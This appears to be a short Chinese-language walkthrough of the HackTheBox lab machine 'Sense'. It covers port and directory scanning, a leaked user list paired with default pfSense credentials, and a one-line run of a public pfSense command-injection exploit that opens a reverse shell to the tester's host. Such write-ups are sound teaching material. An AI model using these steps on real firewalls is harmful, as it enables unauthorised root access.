Sense - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/111

• 10.10.10.60

端口扫描

80和443:

$ nmap -sC -sV 10.10.10.60
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-12 13:46 CST
Nmap scan report for 10.10.10.60
Host is up (0.071s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http     lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
443/tcp open  ssl/http lighttpd 1.4.35
|_http-title: Login
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.66 seconds

80/443

是pfsense：

目录扫描

扫一下目录，重点就两个txt：

➜  ~ gobuster dir -k -u https://10.10.10.60/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 100

/index.php (Status: 200)
/index.html (Status: 200)
/help.php (Status: 200)
/themes (Status: 301)
/stats.php (Status: 200)
/css (Status: 301)
/edit.php (Status: 200)
/includes (Status: 301)
/license.php (Status: 200)
/system.php (Status: 200)
/status.php (Status: 200)
/javascript (Status: 301)
/changelog.txt (Status: 200)
/classes (Status: 301)
/exec.php (Status: 200)
/widgets (Status: 301)
/graph.php (Status: 200)
/tree (Status: 301)
/wizard.php (Status: 200)
/shortcuts (Status: 301)
/pkg.php (Status: 200)
/installer (Status: 301)
/wizards (Status: 301)
/xmlrpc.php (Status: 200)
/reboot.php (Status: 200)
/interfaces.php (Status: 200)
/csrf (Status: 301)
/system-users.txt (Status: 200)

system-users.txt

给出用户名，密码就是默认的，搜一下就知道是pfsense：

changelog.txt

changelog提示存在未修复漏洞：

pfsense

使用前面得到的账号密码登录：

rohit : pfsense

版本2.1.3，直接搜exploit就可以：

• pfSense < 2.1.4 - ‘status_rrd_graph_img.php’ Command Injection - PHP webapps Exploit
  https://www.exploit-db.com/exploits/43560

exploit

exp一键打：

python3 exp.py --rhost 10.10.10.60 --lhost 10.10.14.6 --lport 4444 --username rohit --password pfsense

flags

直接是root权限，读取flags：

参考资料

• pfSense < 2.1.4 - ‘status_rrd_graph_img.php’ Command Injection - PHP webapps Exploit
  https://www.exploit-db.com/exploits/43560
• https://www.hackthebox.eu/home/machines/writeup/111
• HackTheBox - Sense - YouTube
  https://www.youtube.com/watch?v=d2nVDoVr0jE&ab_channel=IppSec